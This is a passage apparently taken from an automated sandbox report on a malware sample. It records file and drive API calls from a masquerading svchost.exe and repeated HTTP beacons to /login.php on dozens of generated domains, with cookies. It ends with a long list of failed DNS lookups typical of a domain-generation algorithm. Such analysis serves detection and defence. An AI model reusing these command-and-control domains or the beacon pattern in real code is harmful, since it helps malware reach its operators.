    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Code function: 8_2_025DD120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,8_2_025DD120
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Code function: 8_2_025C7680 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,8_2_025C7680
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Code function: 8_2_025DE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,8_2_025DE6B0
    Source: C:\Windows\apppatch\svchost.exe Code function: 1_2_02CBE0FB GetLogicalDriveStringsA,GetDriveTypeA,SetErrorMode,free,1_2_02CBE0FB

    Networking

    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyhyg.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lygyvuj.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyhiz.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com
    Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyfyj.com Cookie: sid=cabcb30f-6daf-11ef-bf0d-9c5eae0a9761
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
    Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vofycot.com Cookie: __tad=1725778797.6242731
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyxynyx.com Cookie: __tad=1725778797.8172407
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php?sub1=20240908-1700-25c9-bc2e-507729a41b57 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww16.vofycot.com Connection: Keep-Alive Cookie: __tad=1725778797.6242731
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php?subid1=20240908-1700-25db-aecf-35c2eeb9e276 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww25.lyxynyx.com Connection: Keep-Alive Cookie: __tad=1725778797.8172407
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com
    Source: unknown DNS traffic detected: English language letter frequency does not match the domain names
    Source: unknownDNS traffic detected: query: lygynud.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vofymem.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyrymuj.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qebyfav.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyxywer.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyvyxyj.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lykysix.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vojycif.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lymyjon.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qegyxug.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vocypyt.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puvygyq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qebyqil.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puvydov.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pumyliq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pujyteq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lymyfoj.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vopydum.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: galyros.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyvytuj.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qekykev.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pujymel.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qedyfog.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puvybeg.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pupyjuv.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qedyxip.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pujydag.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vonybat.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qedysyp.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vopymyc.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vopygat.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vojybek.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: ganyrys.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lygyvar.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qexytep.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pufydul.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gatyviw.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lysynur.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gadyquz.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puzylol.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vojyquf.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puryxag.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lymytar.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lymytux.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qetykol.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vocygyk.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lysynaj.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qedytul.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qekynog.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pujywiv.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qekyrov.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pumyxiv.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vopyqim.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pufycol.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lymyner.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyryxen.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vocyqaf.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pumylel.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gacyzuz.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pufytev.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pumytol.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: volykyc.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: volyrac.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pupybul.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gatyfaz.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lysyxux.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gahyzez.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pupyxup.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lymywaj.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyrynad.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lymywun.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vocyruk.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lykyxur.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gacyroh.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qetysal.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gahyhys.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: ganyhuh.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puzyciq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vowyrym.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: purypyq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gacyzaw.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lysylej.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: galynab.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vofypuk.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pujyjup.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: galykiz.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gaqyqis.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qeqynel.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lymysud.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puryxuq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: galyzeb.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyxywij.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: purybav.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pufymoq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: volygyf.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gaqycyz.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qeqylyl.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pumyxep.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qebyvop.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puzywel.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qekyvav.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pupylaq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qebyteg.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pumypyv.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puzymig.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pujyjav.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyvytan.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qegyfyp.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyvymir.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: galydoz.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lymylij.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gacyqob.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lygysij.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pupyboq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyvyfad.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vowypek.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyvyjox.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lymyxex.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pujycov.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gacyfew.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: purymuq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vofyjuk.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qetynev.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyxygud.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qetysuq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: purytov.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyrywax.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vopydek.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qeqysuv.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lykyjad.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lygyged.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qegyfil.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gahyraw.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lygyjuj.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lygymoj.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lygymyn.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyryfox.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gaqypiz.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puvywup.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: ganynyb.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyvyguj.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: galykes.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vojypuc.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vocykif.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puvytag.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qexyqyv.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vopycyf.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puvywav.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pufyxug.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qedykiv.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lygylax.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vojyzyt.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lysyger.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qexylal.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qekylag.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qexyhap.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyvynen.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyvywux.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qegyqug.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: volyquk.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyvyvix.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lygyfex.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puzydal.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lysyjid.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: ganyfes.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vofyzym.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qekyqop.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyvysur.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gadydas.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puvyxeq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pufycyq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lysyfin.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: volycik.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyxylux.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vojydam.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pufybop.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vonyrot.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puzywuq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyrysyj.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qetyxiq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lygytyd.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qeqyvig.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vopybok.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qedyleq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: volybec.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vocybam.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pumydoq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: ganyvoz.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gahyfyz.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: volyjok.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gaqydus.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gaqyreh.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qeqyxyp.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qeqyloq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lymysan.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vofydut.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qetyxeg.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lygyxun.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vojymet.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vofybic.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gahydoh.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyryvur.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pufylap.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qekyfeg.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gadykos.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puvylyg.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qekytyq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: ganyzub.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puvypul.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lykyfen.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puvycip.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pumygyp.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyxytex.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vofyref.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qebykap.com replaycode: Name error (3)
